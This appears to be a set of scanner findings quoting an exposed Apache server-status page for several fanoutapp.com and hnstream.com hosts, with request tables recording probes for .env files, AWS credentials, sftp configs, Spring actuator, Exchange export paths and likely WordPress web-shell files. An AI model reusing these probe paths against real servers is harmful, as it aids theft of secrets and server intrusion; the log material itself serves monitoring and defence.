1-283029950/1/930_ 0.0317369210.00.002.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-283029950/1/927_ 0.0314367360.00.002.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-283029950/1/924_ 0.0313365970.00.003.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-283029950/1/939_ 0.0312382270.00.002.72 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-283029950/1/920_ 0.0311376840.00.002.83 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-283029950/1/945_ 0.0310375770.00.002.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-283029950/1/929_ 0.039386650.00.002.56 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-283029950/1/915_ 0.048364120.00.002.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-283029950/1/950_ 0.047380890.00.002.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-283029950/1/936_ 0.046377650.00.002.49 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-283029950/1/930_ 0.044360210.00.002.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-283029950/1/924_ 0.043377350.00.002.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-283029950/1/955_ 0.042369550.00.002.65 127.0.0.1http/1.1audiostream.fanoutapp.com:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf6c72ad10
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Wednesday, 17-Dec-2025 03:42:15 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 25 days 5 hours 47 minutes 40 seconds Server load: 0.10 0.25 0.20 Total accesses: 56537 - Total Traffic: 163.0 MB - Total Duration: 509324 CPU Usage: u44.57 s67.82 cu730.66 cs212.45 - .0484% CPU load .0259 requests/sec - 78 B/second - 3022 B/request - 9.00868 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0122413no1yes025010 1122412no1yes124010 Sum202 149020 ________________________________W_________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-261224130/11/681_ 0.289396680.00.022.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-261224130/9/664_ 0.288356970.00.022.34 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-261224130/10/663_ 0.297376180.00.021.71 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-261224130/9/641_ 0.296363800.00.021.81 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-261224130/10/677_ 0.295360680.00.032.35 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-261224130/10/645_ 0.293352750.00.022.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-261224130/12/666_ 0.292350840.00.022.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-261224130/9/669_ 0.291359380.00.022.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-261224130/10/659_ 0.2720456890.00.022.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-261224130/9/675_ 0.2720347360.00.022.19 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-261224130/9/668_ 0.2721467180.00.022.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api HTTP/1.1 0-261224130/10/689_ 0.27211667040.00.022.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql HTTP/1.1 0-261224130/10/654_ 0.2722353350.00.092.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-261224130/9/665_ 0.27232155320.00.092.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-261224130/10/652_ 0.290365210.00.022.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-261224130/9/658_ 0.2810348880.00.022.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-261224130/9/672_ 0.2811362590.00.022.32 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-261224130/8/684_ 0.2812361400.00.021.93 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-261224130/9/663_ 0.2813360120.00.022.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-261224130/11/669_ 0.2814374780.00.021.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-261224130/9/654_ 0.2715360430.00.021.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-261224130/10/662_ 0.2716362560.00.022.01 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-261224130/9/661_ 0.2717366160.00.022.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-261224130/10/646_ 0.2718454900.00.031.97 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-261224130/9/673_ 0.2720363050.00.022.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-261224120/5/855_ 0.18103106930.00.092.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-261224120/5/848_ 0.1719370150.00.022.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-261224120/6/845_ 0.189397470.00.012.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-261224120/7/867_ 0.183581210.00.092.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-261224120/8/839_ 0.191391530.00.022.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-261224120/5/864_ 0.1717386490.00.012.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-261224120/6/872_ 0.1813358660.00.012.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-2612241227/5/852W 0.170064330.00.012.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-261224120/7/861_ 0.1722376170.00.032.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-261224120/6/841_ 0.1722461260.00.012.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-261224120/7/863_ 0.1721370420.00.022.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-261224120/4/851_ 0.1721365310.00.012.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-261224120/6/844_ 0.1719363940.00.022.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-261224120/4/846_ 0.1721362040.00.082.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-261224120/4/851_ 0.188375780.00.072.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-261224120/7/838_ 0.187372570.00.022.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-261224120/6/866_ 0.186370740.00.022.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-261224120/6/846_ 0.184382520.00.012.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-261224120/6/836_ 0.192360750.00.012.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-261224120/5/865_ 0.1815374930.00.022.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-261224120/5/855_ 0.1716373710.00.022.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-261224120/6/845_ 0.1810356770.00.012.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-261224120/6/838_ 0.1718372640.00.022.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-261224120/3/876_ 0.1814365990.00.012.44 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfba4f703a
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 14-Dec-2025 13:03:11 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 15 hours 8 minutes 35 seconds Server load: 0.33 0.23 0.19 Total accesses: 51856 - Total Traffic: 147.2 MB - Total Duration: 468267 CPU Usage: u40.88 s60.81 cu645.38 cs188.2 - .0478% CPU load .0265 requests/sec - 78 B/second - 2976 B/request - 9.03014 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04046457no1yes025000 14046328no2yes124011 Sum203 149011 ____________________________________W_____________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2340464570/30/595_ 0.7421391420.00.071.85 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api HTTP/1.1 0-2340464570/25/591_ 0.74221653610.00.192.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql HTTP/1.1 0-2340464570/33/581_ 0.760364590.00.151.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2340464570/28/562_ 0.7521349880.00.071.55 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-2340464570/29/594_ 0.7519355590.00.072.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-2340464570/28/575_ 0.75121747700.00.081.83 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-2340464570/28/573_ 0.7520345490.00.071.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-2340464570/30/583_ 0.7516354080.00.071.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-2340464570/29/577_ 0.7517352170.00.222.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-2340464570/26/591_ 0.7518341530.00.071.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-2340464570/34/583_ 0.7515361110.00.152.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-2340464570/30/604_ 0.7511361950.00.132.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-2340464570/31/568_ 0.7514346990.00.071.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-2340464570/28/579_ 0.75133850800.00.061.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-2340464570/28/571_ 0.7510359030.00.061.86 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-2340464570/28/578_ 0.769344470.00.131.78 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-2340464570/33/591_ 0.761356850.00.161.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2340464570/30/602_ 0.767354690.00.071.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-2340464570/31/590_ 0.764353710.00.072.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-2340464570/25/586_ 0.763359310.00.061.52 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2340464570/31/578_ 0.766355890.00.061.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2340464570/29/577_ 0.762349360.00.071.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2340464570/35/587_ 0.763161650.00.151.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-2340464570/26/569_ 0.768348130.00.131.71 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2340464570/31/589_ 0.7421357170.00.072.02 127.0.0.1http/1.1audiostream.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-2340463280/21/749_ 0.606492480.00.041.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2340463280/18/741_ 0.608364820.00.042.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2340463280/18/733_ 0.6010390820.00.041.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-2340463280/20/758_ 0.607363660.00.052.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2340463280/17/731_ 0.604376990.00.042.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-2340463280/17/753_ 0.6010374690.00.042.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-2340463280/21/769_ 0.602352930.00.052.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2340463280/18/736_ 0.610356060.00.052.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2340463280/20/751_ 0.605370880.00.052.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2340463280/18/740_ 0.611354090.00.041.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2340463280/18/752_ 0.5821362070.00.042.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-23404632827/17/742W 0.580061260.00.041.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2340463280/15/741_ 0.5918350810.00.041.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-2340463280/17/745_ 0.5915354720.00.032.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-2340463280/15/748_ 0.5821368710.00.032.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-2340463280/16/735_ 0.5919360110.00.042.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-2340463280/19/769_ 0.5616864110.00.052.22 104.156.91.26http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2340463280/17/749_ 0.5821466860.00.052.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-2340463280/16/733_ 0.5821350140.00.042.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-2340463280/20/751_ 0.5920361970.00.052.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-2340463280/18/743_ 0.5912661390.00.051.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-2340463280/16/745_ 0.5916351310.00.042.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-2340463280/19/737_ 0.59134959170.00.052.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-2340463280/19/774_ 0.5911<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf62ffd8c8
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 14-Dec-2025 04:28:08 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 6 hours 33 minutes 33 seconds Server load: 0.05 0.13 0.16 Total accesses: 51120 - Total Traffic: 144.7 MB - Total Duration: 462784 CPU Usage: u39.73 s59.6 cu645.38 cs188.2 - .0485% CPU load .0266 requests/sec - 78 B/second - 2968 B/request - 9.0529 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04046457no0yes025000 14046328no1yes124010 Sum201 149010 ______________________________W___________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2340464570/12/577_ 0.253697190280.00.021.81 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2340464570/6/572_ 0.233692053000.00.081.98 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/autoload_classmap.php HTTP/1.1 0-2340464570/12/560_ 0.262780062930.00.021.32 127.0.0.1http/1.1hnstream.com:8000GET /.well-known/security.txt HTTP/1.1 0-2340464570/9/543_ 0.242775049030.00.021.51 127.0.0.1http/1.1hnstream.com:8000GET /geju.php HTTP/1.1 0-2340464570/9/574_ 0.262546254690.00.011.97 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2340464570/11/558_ 0.242524046310.00.031.78 127.0.0.1http/1.1hnstream.com:8000GET /wp.php HTTP/1.1 0-2340464570/8/553_ 0.232541044720.00.021.79 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/themes/admin.php HTTP/1.1 0-2340464570/11/564_ 0.261790152390.00.031.62 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2340464570/7/555_ 0.2619971850240.00.022.06 157.52.100.52http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 0-2340464570/8/573_ 0.231992040360.00.021.87 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/IXR HTTP/1.1 0-2340464570/13/562_ 0.241785159390.00.022.16 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2340464570/10/584_ 0.241133461070.00.022.14 127.0.0.1http/1.1api.hnstream.com:8000GET /user/.aws/credentials HTTP/1.1 0-2340464570/11/548_ 0.271138245480.00.021.68 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2340464570/10/561_ 0.27447249410.00.021.69 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2340464570/10/553_ 0.24441058140.00.021.81 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/block-supports HTTP/1.1 0-2340464570/7/557_ 0.24420043470.00.011.66 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/blocks/code HTTP/1.1 0-2340464570/10/568_ 0.245745054500.00.021.77 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/html-api/index.php HTTP/1.1 0-2340464570/11/583_ 0.245745053880.00.021.55 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/customize/chosen.php HTTP/1.1 0-2340464570/8/567_ 0.2551112052530.00.021.97 157.52.115.25http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2340464570/7/568_ 0.245106058500.00.021.48 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/js/dist/development/index.php HTTP/1.1 0-2340464570/9/556_ 0.2545121155340.00.021.61 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-2340464570/8/556_ 0.254511148180.00.021.70 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-2340464570/10/562_ 0.244506059270.00.021.78 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/sitemaps/autoload_classmap.php HTTP/1.1 0-2340464570/6/549_ 0.254401047430.00.011.59 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2340464570/8/566_ 0.234396055410.00.011.96 127.0.0.1http/1.1hnstream.com:8000GET /wp-admin/js/autoload_classmap.php HTTP/1.1 1-2340463280/11/739_ 0.295390720.00.021.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2340463280/9/732_ 0.294363800.00.022.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-2340463280/10/725_ 0.297389950.00.021.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2340463280/10/748_ 0.293362630.00.032.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2340463280/10/724_ 0.292376250.00.032.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-23404632827/7/743W 0.270074000.00.022.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2340463280/11/759_ 0.291451510.00.032.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2340463280/10/728_ 0.2721355630.00.032.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 1-2340463280/11/742_ 0.2722470170.00.032.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 1-2340463280/7/729_ 0.2721353600.00.021.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 1-2340463280/7/741_ 0.2821361060.00.022.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-2340463280/7/732_ 0.2821360810.00.021.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-2340463280/8/734_ 0.2819349510.00.021.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-2340463280/7/735_ 0.2818352880.00.012.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-2340463280/7/740_ 0.2818367880.00.022.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-2340463280/6/725_ 0.2817359180.00.022.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-2340463280/9/759_ 0.2816362500.00.022.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-2340463280/8/740_ 0.2815366190.00.032.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-2340463280/8/725_ 0.2813349800.00.022.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-2340463280/9/740_ 0.2814361040.00.032.00 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-2340463280/9/734_ 0.299359720.00.021.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2340463280/7/736_ 0.2812350950.00.022.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-2340463280/9/727_ 0.2911358220.00.022.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-2340463280/9/764_ 0.298358570.00.022.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-234046328
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfbd10566b
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Saturday, 13-Dec-2025 18:58:05 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 23 Parent Server MPM Generation: 22 Server uptime: 21 days 21 hours 3 minutes 30 seconds Server load: 0.11 0.16 0.11 Total accesses: 50319 - Total Traffic: 142.1 MB - Total Duration: 454474 CPU Usage: u39.84 s58.93 cu616.91 cs179.61 - .0474% CPU load .0266 requests/sec - 78 B/second - 2961 B/request - 9.03186 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 13957841no1yes124010 23957840no1yes025010 Sum202 149020 .........................___W___________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-17-0/0/565. 0.0048128368984240.00.001.79 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.example HTTP/1.1 0-17-0/0/566. 0.0048128318252650.00.001.90 140.248.74.24http/1.1api.hnstream.com:8000GET /config/module.config.php HTTP/1.1 0-17-0/0/548. 0.0048128348157690.00.001.30 140.248.74.24http/1.1api.hnstream.com:8000GET /.docker/.env HTTP/1.1 0-17-0/0/534. 0.0048128313248780.00.001.49 140.248.74.24http/1.1api.hnstream.com:8000GET /config/test.json HTTP/1.1 0-17-0/0/565. 0.0048128321653770.00.001.96 140.248.74.24http/1.1api.hnstream.com:8000GET /config.json HTTP/1.1 0-17-0/0/547. 0.0048128327445790.00.001.75 140.248.74.24http/1.1api.hnstream.com:8000GET /tsconfig.json HTTP/1.1 0-17-0/0/545. 0.0048128329944490.00.001.76 140.248.74.24http/1.1api.hnstream.com:8000GET /?pp=env&pp=env HTTP/1.1 0-17-0/0/553. 0.0048128352952150.00.001.60 140.248.74.24http/1.1api.hnstream.com:8000GET /conf/application.json HTTP/1.1 0-17-0/0/548. 0.0048128341049920.00.002.04 140.248.74.24http/1.1api.hnstream.com:8000GET /appsettings.Local.json HTTP/1.1 0-17-0/0/565. 0.0048128347440210.00.001.85 140.248.74.24http/1.1api.hnstream.com:8000GET /laravel/core/.env HTTP/1.1 0-17-0/0/549. 0.0048128345659160.00.002.13 140.248.74.24http/1.1api.hnstream.com:8000GET /config/dev.json HTTP/1.1 0-17-0/0/574. 0.0048128368960650.00.002.12 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.prod.local HTTP/1.1 0-17-0/0/537. 0.0048128335845280.00.001.66 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.sample HTTP/1.1 0-17-0/0/551. 0.0048128339049230.00.001.67 140.248.74.24http/1.1api.hnstream.com:8000GET /.env.docker.dev HTTP/1.1 0-17-0/0/543. 0.0048128345757780.00.001.80 